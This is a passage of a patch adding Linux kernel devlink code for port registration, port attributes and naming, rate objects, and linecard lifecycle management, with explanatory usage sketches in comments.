++	xa_set_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
++	devlink_put(devlink);
++	wait_for_completion(&devlink->comp);
++
++	devlink_notify_unregister(devlink);
++	xa_clear_mark(&devlinks, devlink->index, DEVLINK_REGISTERED);
++	xa_clear_mark(&devlinks, devlink->index, DEVLINK_UNREGISTERING);
++}
++EXPORT_SYMBOL_GPL(devlink_unregister);
++
++/**
++ *	devlink_free - Free devlink instance resources
++ *
++ *	@devlink: devlink
++ */
++void devlink_free(struct devlink *devlink)
++{
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	mutex_destroy(&devlink->linecards_lock);
++	mutex_destroy(&devlink->reporters_lock);
++	mutex_destroy(&devlink->lock);
++	lockdep_unregister_key(&devlink->lock_key);
++	WARN_ON(!list_empty(&devlink->trap_policer_list));
++	WARN_ON(!list_empty(&devlink->trap_group_list));
++	WARN_ON(!list_empty(&devlink->trap_list));
++	WARN_ON(!list_empty(&devlink->reporter_list));
++	WARN_ON(!list_empty(&devlink->region_list));
++	WARN_ON(!list_empty(&devlink->param_list));
++	WARN_ON(!list_empty(&devlink->resource_list));
++	WARN_ON(!list_empty(&devlink->dpipe_table_list));
++	WARN_ON(!list_empty(&devlink->sb_list));
++	WARN_ON(!list_empty(&devlink->rate_list));
++	WARN_ON(!list_empty(&devlink->linecard_list));
++	WARN_ON(!list_empty(&devlink->port_list));
++
++	xa_destroy(&devlink->snapshot_ids);
++	xa_erase(&devlinks, devlink->index);
++
++	kfree(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_free);
++
++static void devlink_port_type_warn(struct work_struct *work)
++{
++	struct devlink_port *port = container_of(to_delayed_work(work),
++						 struct devlink_port,
++						 type_warn_dw);
++	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
++}
++
++static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
++{
++	/* Ignore CPU and DSA flavours. */
++	return devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_CPU &&
++	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_DSA &&
++	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_UNUSED;
++}
++
++#define DEVLINK_PORT_TYPE_WARN_TIMEOUT (HZ * 3600)
++
++static void devlink_port_type_warn_schedule(struct devlink_port *devlink_port)
++{
++	if (!devlink_port_type_should_warn(devlink_port))
++		return;
++	/* Schedule a work item to WARN in case the driver does not set
++	 * the port type within the timeout.
++	 */
++	schedule_delayed_work(&devlink_port->type_warn_dw,
++			      DEVLINK_PORT_TYPE_WARN_TIMEOUT);
++}
++
++static void devlink_port_type_warn_cancel(struct devlink_port *devlink_port)
++{
++	if (!devlink_port_type_should_warn(devlink_port))
++		return;
++	cancel_delayed_work_sync(&devlink_port->type_warn_dw);
++}
++
++/**
++ * devlink_port_init() - Init devlink port
++ *
++ * @devlink: devlink
++ * @devlink_port: devlink port
++ *
++ * Initialize the essential fields needed by functions
++ * that may be called before devlink port registration.
++ * Calling this function is optional; it is not needed
++ * if the driver does not use such functions.
++ */
++void devlink_port_init(struct devlink *devlink,
++		       struct devlink_port *devlink_port)
++{
++	if (devlink_port->initialized)
++		return;
++	devlink_port->devlink = devlink;
++	INIT_LIST_HEAD(&devlink_port->region_list);
++	devlink_port->initialized = true;
++}
++EXPORT_SYMBOL_GPL(devlink_port_init);
++
++/**
++ * devlink_port_fini() - Deinitialize devlink port
++ *
++ * @devlink_port: devlink port
++ *
++ * Deinitialize the essential fields used by functions
++ * that may be called after devlink port unregistration.
++ * Calling this function is optional; it is not needed
++ * if the driver does not use such functions.
++ */
++void devlink_port_fini(struct devlink_port *devlink_port)
++{
++	WARN_ON(!list_empty(&devlink_port->region_list));
++}
++EXPORT_SYMBOL_GPL(devlink_port_fini);
++
++/**
++ * devl_port_register() - Register devlink port
++ *
++ * @devlink: devlink
++ * @devlink_port: devlink port
++ * @port_index: driver-specific numerical identifier of the port
++ *
++ * Register the devlink port with the provided port index. The caller
++ * may use any indexing scheme, even a hw-related one. The devlink_port
++ * structure is convenient to embed inside the driver's private structure.
++ * Note that the caller is responsible for zeroing the devlink_port
++ * structure.
++ */
++int devl_port_register(struct devlink *devlink,
++		       struct devlink_port *devlink_port,
++		       unsigned int port_index)
++{
++	devl_assert_locked(devlink);
++
++	if (devlink_port_index_exists(devlink, port_index))
++		return -EEXIST;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port_init(devlink, devlink_port);
++	devlink_port->registered = true;
++	devlink_port->index = port_index;
++	spin_lock_init(&devlink_port->type_lock);
++	INIT_LIST_HEAD(&devlink_port->reporter_list);
++	mutex_init(&devlink_port->reporters_lock);
++	list_add_tail(&devlink_port->list, &devlink->port_list);
++
++	INIT_DELAYED_WORK(&devlink_port->type_warn_dw, &devlink_port_type_warn);
++	devlink_port_type_warn_schedule(devlink_port);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_port_register);
++
++/**
++ *	devlink_port_register - Register devlink port
++ *
++ *	@devlink: devlink
++ *	@devlink_port: devlink port
++ *	@port_index: driver-specific numerical identifier of the port
++ *
++ *	Register the devlink port with the provided port index. The caller
++ *	may use any indexing scheme, even a hw-related one. The devlink_port
++ *	structure is convenient to embed inside the driver's private structure.
++ *	Note that the caller is responsible for zeroing the devlink_port
++ *	structure.
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++int devlink_port_register(struct devlink *devlink,
++			  struct devlink_port *devlink_port,
++			  unsigned int port_index)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_port_register(devlink, devlink_port, port_index);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_port_register);
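++
++/* A minimal sketch of port registration, assuming a hypothetical
++ * 'struct my_port' that embeds the devlink_port; kzalloc() provides
++ * the zeroing the comment above asks for:
++ *
++ *	struct my_port {
++ *		struct devlink_port dl_port;
++ *		...
++ *	};
++ *
++ *	struct my_port *p = kzalloc(sizeof(*p), GFP_KERNEL);
++ *
++ *	if (!p)
++ *		return -ENOMEM;
++ *	err = devlink_port_register(devlink, &p->dl_port, port_index);
++ *
++ * Drivers already holding the instance lock call devl_port_register()
++ * directly, since this wrapper takes devlink->lock itself.
++ */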
++
++/**
++ * devl_port_unregister() - Unregister devlink port
++ *
++ * @devlink_port: devlink port
++ */
++void devl_port_unregister(struct devlink_port *devlink_port)
++{
++	lockdep_assert_held(&devlink_port->devlink->lock);
++
++	devlink_port_type_warn_cancel(devlink_port);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
++	list_del(&devlink_port->list);
++	WARN_ON(!list_empty(&devlink_port->reporter_list));
++	mutex_destroy(&devlink_port->reporters_lock);
++	devlink_port->registered = false;
++}
++EXPORT_SYMBOL_GPL(devl_port_unregister);
++
++/**
++ *	devlink_port_unregister - Unregister devlink port
++ *
++ *	@devlink_port: devlink port
++ *
++ *	Context: Takes and releases devlink->lock <mutex>.
++ */
++void devlink_port_unregister(struct devlink_port *devlink_port)
++{
++	struct devlink *devlink = devlink_port->devlink;
++
++	devl_lock(devlink);
++	devl_port_unregister(devlink_port);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_port_unregister);
++
++static void __devlink_port_type_set(struct devlink_port *devlink_port,
++				    enum devlink_port_type type,
++				    void *type_dev)
++{
++	ASSERT_DEVLINK_PORT_REGISTERED(devlink_port);
++
++	devlink_port_type_warn_cancel(devlink_port);
++	spin_lock_bh(&devlink_port->type_lock);
++	devlink_port->type = type;
++	devlink_port->type_dev = type_dev;
++	spin_unlock_bh(&devlink_port->type_lock);
++	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
++}
++
++static void devlink_port_type_netdev_checks(struct devlink_port *devlink_port,
++					    struct net_device *netdev)
++{
++	const struct net_device_ops *ops = netdev->netdev_ops;
++
++	/* If the driver registers a devlink port, it should set the
++	 * devlink port attributes accordingly so that the compat
++	 * functions are called and the original ops are not used.
++	 */
++	if (ops->ndo_get_phys_port_name) {
++		/* Some drivers use the same set of ndos for netdevs
++		 * that have devlink_port registered and also for
++		 * those that don't. Make sure that ndo_get_phys_port_name
++		 * returns -EOPNOTSUPP here in case it is defined.
++		 * Warn if not.
++		 */
++		char name[IFNAMSIZ];
++		int err;
++
++		err = ops->ndo_get_phys_port_name(netdev, name, sizeof(name));
++		WARN_ON(err != -EOPNOTSUPP);
++	}
++	if (ops->ndo_get_port_parent_id) {
++		/* Some drivers use the same set of ndos for netdevs
++		 * that have devlink_port registered and also for
++		 * those that don't. Make sure that ndo_get_port_parent_id
++		 * returns -EOPNOTSUPP here in case it is defined.
++		 * Warn if not.
++		 */
++		struct netdev_phys_item_id ppid;
++		int err;
++
++		err = ops->ndo_get_port_parent_id(netdev, &ppid);
++		WARN_ON(err != -EOPNOTSUPP);
++	}
++}
++
++/**
++ *	devlink_port_type_eth_set - Set port type to Ethernet
++ *
++ *	@devlink_port: devlink port
++ *	@netdev: related netdevice
++ */
++void devlink_port_type_eth_set(struct devlink_port *devlink_port,
++			       struct net_device *netdev)
++{
++	if (netdev)
++		devlink_port_type_netdev_checks(devlink_port, netdev);
++	else
++		dev_warn(devlink_port->devlink->dev,
++			 "devlink port type for port %d set to Ethernet without a software interface reference, device type not supported by the kernel?\n",
++			 devlink_port->index);
++
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_ETH, netdev);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_eth_set);
++
++/**
++ *	devlink_port_type_ib_set - Set port type to InfiniBand
++ *
++ *	@devlink_port: devlink port
++ *	@ibdev: related IB device
++ */
++void devlink_port_type_ib_set(struct devlink_port *devlink_port,
++			      struct ib_device *ibdev)
++{
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_IB, ibdev);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_ib_set);
++
++/**
++ *	devlink_port_type_clear - Clear port type
++ *
++ *	@devlink_port: devlink port
++ */
++void devlink_port_type_clear(struct devlink_port *devlink_port)
++{
++	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_NOTSET, NULL);
++	devlink_port_type_warn_schedule(devlink_port);
++}
++EXPORT_SYMBOL_GPL(devlink_port_type_clear);
++
++static int __devlink_port_attrs_set(struct devlink_port *devlink_port,
++				    enum devlink_port_flavour flavour)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++
++	devlink_port->attrs_set = true;
++	attrs->flavour = flavour;
++	if (attrs->switch_id.id_len) {
++		devlink_port->switch_port = true;
++		if (WARN_ON(attrs->switch_id.id_len > MAX_PHYS_ITEM_ID_LEN))
++			attrs->switch_id.id_len = MAX_PHYS_ITEM_ID_LEN;
++	} else {
++		devlink_port->switch_port = false;
++	}
++	return 0;
++}
++
++/**
++ *	devlink_port_attrs_set - Set port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@attrs: devlink port attrs
++ */
++void devlink_port_attrs_set(struct devlink_port *devlink_port,
++			    struct devlink_port_attrs *attrs)
++{
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port->attrs = *attrs;
++	ret = __devlink_port_attrs_set(devlink_port, attrs->flavour);
++	if (ret)
++		return;
++	WARN_ON(attrs->splittable && attrs->split);
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_set);
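++
++/* A short sketch of setting physical-port attributes before port
++ * registration; the values are illustrative:
++ *
++ *	struct devlink_port_attrs attrs = {};
++ *
++ *	attrs.flavour = DEVLINK_PORT_FLAVOUR_PHYSICAL;
++ *	attrs.phys.port_number = 1;
++ *	attrs.splittable = true;
++ *	attrs.lanes = 4;
++ *	devlink_port_attrs_set(&p->dl_port, &attrs);
++ *
++ * The WARN_ON above flags the contradictory case of a port marked
++ * both splittable and already split.
++ */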
++
++/**
++ *	devlink_port_attrs_pci_pf_set - Set PCI PF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_pf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_PF);
++	if (ret)
++		return;
++	attrs->pci_pf.controller = controller;
++	attrs->pci_pf.pf = pf;
++	attrs->pci_pf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_pf_set);
++
++/**
++ *	devlink_port_attrs_pci_vf_set - Set PCI VF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@vf: associated VF of a PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_vf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, u16 vf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_VF);
++	if (ret)
++		return;
++	attrs->pci_vf.controller = controller;
++	attrs->pci_vf.pf = pf;
++	attrs->pci_vf.vf = vf;
++	attrs->pci_vf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_vf_set);
++
++/**
++ *	devlink_port_attrs_pci_sf_set - Set PCI SF port attributes
++ *
++ *	@devlink_port: devlink port
++ *	@controller: associated controller number for the devlink port instance
++ *	@pf: associated PF for the devlink port instance
++ *	@sf: associated SF of a PF for the devlink port instance
++ *	@external: indicates if the port is for an external controller
++ */
++void devlink_port_attrs_pci_sf_set(struct devlink_port *devlink_port, u32 controller,
++				   u16 pf, u32 sf, bool external)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int ret;
++
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	ret = __devlink_port_attrs_set(devlink_port,
++				       DEVLINK_PORT_FLAVOUR_PCI_SF);
++	if (ret)
++		return;
++	attrs->pci_sf.controller = controller;
++	attrs->pci_sf.pf = pf;
++	attrs->pci_sf.sf = sf;
++	attrs->pci_sf.external = external;
++}
++EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_sf_set);
++
++/**
++ * devl_rate_leaf_create - create devlink rate leaf
++ * @devlink_port: devlink port object to create rate object on
++ * @priv: driver private data
++ *
++ * Create devlink rate object of type leaf on provided @devlink_port.
++ */
++int devl_rate_leaf_create(struct devlink_port *devlink_port, void *priv)
++{
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_rate *devlink_rate;
++
++	devl_assert_locked(devlink_port->devlink);
++
++	if (WARN_ON(devlink_port->devlink_rate))
++		return -EBUSY;
++
++	devlink_rate = kzalloc(sizeof(*devlink_rate), GFP_KERNEL);
++	if (!devlink_rate)
++		return -ENOMEM;
++
++	devlink_rate->type = DEVLINK_RATE_TYPE_LEAF;
++	devlink_rate->devlink = devlink;
++	devlink_rate->devlink_port = devlink_port;
++	devlink_rate->priv = priv;
++	list_add_tail(&devlink_rate->list, &devlink->rate_list);
++	devlink_port->devlink_rate = devlink_rate;
++	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_rate_leaf_create);
++
++/**
++ * devl_rate_leaf_destroy - destroy devlink rate leaf
++ *
++ * @devlink_port: devlink port linked to the rate object
++ *
++ * Destroy the devlink rate object of type leaf on provided @devlink_port.
++ */
++void devl_rate_leaf_destroy(struct devlink_port *devlink_port)
++{
++	struct devlink_rate *devlink_rate = devlink_port->devlink_rate;
++
++	devl_assert_locked(devlink_port->devlink);
++	if (!devlink_rate)
++		return;
++
++	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_DEL);
++	if (devlink_rate->parent)
++		refcount_dec(&devlink_rate->parent->refcnt);
++	list_del(&devlink_rate->list);
++	devlink_port->devlink_rate = NULL;
++	kfree(devlink_rate);
++}
++EXPORT_SYMBOL_GPL(devl_rate_leaf_destroy);
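++
++/* A minimal sketch of the rate-leaf lifecycle; both helpers assert
++ * the instance lock, so callers outside a locked context take it
++ * explicitly ('priv' stands in for driver data):
++ *
++ *	devl_lock(devlink);
++ *	err = devl_rate_leaf_create(&p->dl_port, priv);
++ *	...
++ *	devl_rate_leaf_destroy(&p->dl_port);
++ *	devl_unlock(devlink);
++ */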
++
++/**
++ * devl_rate_nodes_destroy - destroy all devlink rate nodes on device
++ * @devlink: devlink instance
++ *
++ * Unset parent for all rate objects and destroy all rate nodes
++ * on specified device.
++ */
++void devl_rate_nodes_destroy(struct devlink *devlink)
++{
++	struct devlink_rate *devlink_rate, *tmp;
++	const struct devlink_ops *ops = devlink->ops;
++
++	devl_assert_locked(devlink);
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++		if (!devlink_rate->parent)
++			continue;
++
++		refcount_dec(&devlink_rate->parent->refcnt);
++		if (devlink_rate_is_leaf(devlink_rate))
++			ops->rate_leaf_parent_set(devlink_rate, NULL, devlink_rate->priv,
++						  NULL, NULL);
++		else if (devlink_rate_is_node(devlink_rate))
++			ops->rate_node_parent_set(devlink_rate, NULL, devlink_rate->priv,
++						  NULL, NULL);
++	}
++	list_for_each_entry_safe(devlink_rate, tmp, &devlink->rate_list, list) {
++		if (devlink_rate_is_node(devlink_rate)) {
++			ops->rate_node_del(devlink_rate, devlink_rate->priv, NULL);
++			list_del(&devlink_rate->list);
++			kfree(devlink_rate->name);
++			kfree(devlink_rate);
++		}
++	}
++}
++EXPORT_SYMBOL_GPL(devl_rate_nodes_destroy);
++
++/**
++ *	devlink_port_linecard_set - Link port with a linecard
++ *
++ *	@devlink_port: devlink port
++ *	@linecard: devlink linecard
++ */
++void devlink_port_linecard_set(struct devlink_port *devlink_port,
++			       struct devlink_linecard *linecard)
++{
++	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
++
++	devlink_port->linecard = linecard;
++}
++EXPORT_SYMBOL_GPL(devlink_port_linecard_set);
++
++static int __devlink_port_phys_port_name_get(struct devlink_port *devlink_port,
++					     char *name, size_t len)
++{
++	struct devlink_port_attrs *attrs = &devlink_port->attrs;
++	int n = 0;
++
++	if (!devlink_port->attrs_set)
++		return -EOPNOTSUPP;
++
++	switch (attrs->flavour) {
++	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
++		if (devlink_port->linecard)
++			n = snprintf(name, len, "l%u",
++				     devlink_port->linecard->index);
++		if (n < len)
++			n += snprintf(name + n, len - n, "p%u",
++				      attrs->phys.port_number);
++		if (n < len && attrs->split)
++			n += snprintf(name + n, len - n, "s%u",
++				      attrs->phys.split_subport_number);
++		break;
++	case DEVLINK_PORT_FLAVOUR_CPU:
++	case DEVLINK_PORT_FLAVOUR_DSA:
++	case DEVLINK_PORT_FLAVOUR_UNUSED:
++		/* As CPU and DSA ports do not have an associated netdevice,
++		 * this case should never happen.
++		 */
++		WARN_ON(1);
++		return -EINVAL;
++	case DEVLINK_PORT_FLAVOUR_PCI_PF:
++		if (attrs->pci_pf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_pf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%u", attrs->pci_pf.pf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_VF:
++		if (attrs->pci_vf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_vf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%uvf%u",
++			     attrs->pci_vf.pf, attrs->pci_vf.vf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_PCI_SF:
++		if (attrs->pci_sf.external) {
++			n = snprintf(name, len, "c%u", attrs->pci_sf.controller);
++			if (n >= len)
++				return -EINVAL;
++			len -= n;
++			name += n;
++		}
++		n = snprintf(name, len, "pf%usf%u", attrs->pci_sf.pf,
++			     attrs->pci_sf.sf);
++		break;
++	case DEVLINK_PORT_FLAVOUR_VIRTUAL:
++		return -EOPNOTSUPP;
++	}
++
++	if (n >= len)
++		return -EINVAL;
++
++	return 0;
++}
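++
++/* Worked examples of the naming scheme implemented above, derived
++ * from the switch statement (index values are illustrative):
++ *
++ *	PHYSICAL, port 1                     ->  "p1"
++ *	PHYSICAL, port 1, split subport 0    ->  "p1s0"
++ *	PHYSICAL on linecard 8, port 1       ->  "l8p1"
++ *	PCI_PF, pf 0                         ->  "pf0"
++ *	PCI_VF, pf 0, vf 2, external ctrl 1  ->  "c1pf0vf2"
++ *	PCI_SF, pf 0, sf 1                   ->  "pf0sf1"
++ */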
++
++static int devlink_linecard_types_init(struct devlink_linecard *linecard)
++{
++	struct devlink_linecard_type *linecard_type;
++	unsigned int count;
++	int i;
++
++	count = linecard->ops->types_count(linecard, linecard->priv);
++	linecard->types = kmalloc_array(count, sizeof(*linecard_type),
++					GFP_KERNEL);
++	if (!linecard->types)
++		return -ENOMEM;
++	linecard->types_count = count;
++
++	for (i = 0; i < count; i++) {
++		linecard_type = &linecard->types[i];
++		linecard->ops->types_get(linecard, linecard->priv, i,
++					 &linecard_type->type,
++					 &linecard_type->priv);
++	}
++	return 0;
++}
++
++static void devlink_linecard_types_fini(struct devlink_linecard *linecard)
++{
++	kfree(linecard->types);
++}
++
++/**
++ *	devlink_linecard_create - Create devlink linecard
++ *
++ *	@devlink: devlink
++ *	@linecard_index: driver-specific numerical identifier of the linecard
++ *	@ops: linecard ops
++ *	@priv: user priv pointer
++ *
++ *	Create devlink linecard instance with provided linecard index.
++ *	Caller can use any indexing, even a hw-related one.
++ *
++ *	Return: Line card structure or an ERR_PTR() encoded error code.
++ */
++struct devlink_linecard *
++devlink_linecard_create(struct devlink *devlink, unsigned int linecard_index,
++			const struct devlink_linecard_ops *ops, void *priv)
++{
++	struct devlink_linecard *linecard;
++	int err;
++
++	if (WARN_ON(!ops || !ops->provision || !ops->unprovision ||
++		    !ops->types_count || !ops->types_get))
++		return ERR_PTR(-EINVAL);
++
++	mutex_lock(&devlink->linecards_lock);
++	if (devlink_linecard_index_exists(devlink, linecard_index)) {
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(-EEXIST);
++	}
++
++	linecard = kzalloc(sizeof(*linecard), GFP_KERNEL);
++	if (!linecard) {
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(-ENOMEM);
++	}
++
++	linecard->devlink = devlink;
++	linecard->index = linecard_index;
++	linecard->ops = ops;
++	linecard->priv = priv;
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++	mutex_init(&linecard->state_lock);
++
++	err = devlink_linecard_types_init(linecard);
++	if (err) {
++		mutex_destroy(&linecard->state_lock);
++		kfree(linecard);
++		mutex_unlock(&devlink->linecards_lock);
++		return ERR_PTR(err);
++	}
++
++	list_add_tail(&linecard->list, &devlink->linecard_list);
++	refcount_set(&linecard->refcount, 1);
++	mutex_unlock(&devlink->linecards_lock);
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	return linecard;
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_create);
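For illustration, a minimal driver-side sketch of consuming this API; the my_* ops and helpers are hypothetical and not part of this patch:

	static const struct devlink_linecard_ops my_lc_ops = {
		.provision	= my_lc_provision,
		.unprovision	= my_lc_unprovision,
		.types_count	= my_lc_types_count,
		.types_get	= my_lc_types_get,
	};

	static int my_linecard_init(struct devlink *devlink, unsigned int idx,
				    void *priv)
	{
		struct devlink_linecard *lc;

		/* Fails with -EEXIST if the index is already taken. */
		lc = devlink_linecard_create(devlink, idx, &my_lc_ops, priv);
		return PTR_ERR_OR_ZERO(lc);
	}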
++
++/**
++ *	devlink_linecard_destroy - Destroy devlink linecard
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_destroy(struct devlink_linecard *linecard)
++{
++	struct devlink *devlink = linecard->devlink;
++
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
++	mutex_lock(&devlink->linecards_lock);
++	list_del(&linecard->list);
++	devlink_linecard_types_fini(linecard);
++	mutex_unlock(&devlink->linecards_lock);
++	devlink_linecard_put(linecard);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_destroy);
++
++/**
++ *	devlink_linecard_provision_set - Set provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *	@type: linecard type
++ *
++ *	This is either called directly from the provision() op call or
++ *	as a result of the provision() op call asynchronously.
++ */
++void devlink_linecard_provision_set(struct devlink_linecard *linecard,
++				    const char *type)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->type && strcmp(linecard->type, type));
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
++	linecard->type = type;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_set);
++
++/**
++ *	devlink_linecard_provision_clear - Clear provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *
++ *	This is either called directly from the unprovision() op call or
++ *	as a result of the unprovision() op call asynchronously.
++ */
++void devlink_linecard_provision_clear(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->nested_devlink);
++	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
++	linecard->type = NULL;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_clear);
++
++/**
++ *	devlink_linecard_provision_fail - Fail provisioning on linecard
++ *
++ *	@linecard: devlink linecard
++ *
++ *	This is either called directly from the provision() op call or
++ *	as a result of the provision() op call asynchronously.
++ */
++void devlink_linecard_provision_fail(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->nested_devlink);
++	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING_FAILED;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_provision_fail);
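Taken together, a hypothetical provision() op would use the setters above as follows (my_hw_provision is an assumed driver helper):

	static int my_lc_provision(struct devlink_linecard *linecard, void *priv,
				   const char *type, const void *type_priv,
				   struct netlink_ext_ack *extack)
	{
		int err;

		err = my_hw_provision(priv, type_priv);
		if (err) {
			devlink_linecard_provision_fail(linecard);
			return err;
		}
		devlink_linecard_provision_set(linecard, type);
		return 0;
	}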
++
++/**
++ *	devlink_linecard_activate - Set linecard active
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_activate(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	WARN_ON(linecard->state != DEVLINK_LINECARD_STATE_PROVISIONED);
++	linecard->state = DEVLINK_LINECARD_STATE_ACTIVE;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_activate);
++
++/**
++ *	devlink_linecard_deactivate - Set linecard inactive
++ *
++ *	@linecard: devlink linecard
++ */
++void devlink_linecard_deactivate(struct devlink_linecard *linecard)
++{
++	mutex_lock(&linecard->state_lock);
++	switch (linecard->state) {
++	case DEVLINK_LINECARD_STATE_ACTIVE:
++		linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
++		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++		break;
++	case DEVLINK_LINECARD_STATE_UNPROVISIONING:
++		/* Line card is being deactivated as part
++		 * of unprovisioning flow.
++		 */
++		break;
++	default:
++		WARN_ON(1);
++		break;
++	}
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_deactivate);
++
++/**
++ *	devlink_linecard_nested_dl_set - Attach/detach nested devlink
++ *					 instance to linecard.
++ *
++ *	@linecard: devlink linecard
++ *	@nested_devlink: devlink instance to attach or NULL to detach
++ */
++void devlink_linecard_nested_dl_set(struct devlink_linecard *linecard,
++				    struct devlink *nested_devlink)
++{
++	mutex_lock(&linecard->state_lock);
++	linecard->nested_devlink = nested_devlink;
++	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
++	mutex_unlock(&linecard->state_lock);
++}
++EXPORT_SYMBOL_GPL(devlink_linecard_nested_dl_set);
++
++int devl_sb_register(struct devlink *devlink, unsigned int sb_index,
++		     u32 size, u16 ingress_pools_count,
++		     u16 egress_pools_count, u16 ingress_tc_count,
++		     u16 egress_tc_count)
++{
++	struct devlink_sb *devlink_sb;
++
++	lockdep_assert_held(&devlink->lock);
++
++	if (devlink_sb_index_exists(devlink, sb_index))
++		return -EEXIST;
++
++	devlink_sb = kzalloc(sizeof(*devlink_sb), GFP_KERNEL);
++	if (!devlink_sb)
++		return -ENOMEM;
++	devlink_sb->index = sb_index;
++	devlink_sb->size = size;
++	devlink_sb->ingress_pools_count = ingress_pools_count;
++	devlink_sb->egress_pools_count = egress_pools_count;
++	devlink_sb->ingress_tc_count = ingress_tc_count;
++	devlink_sb->egress_tc_count = egress_tc_count;
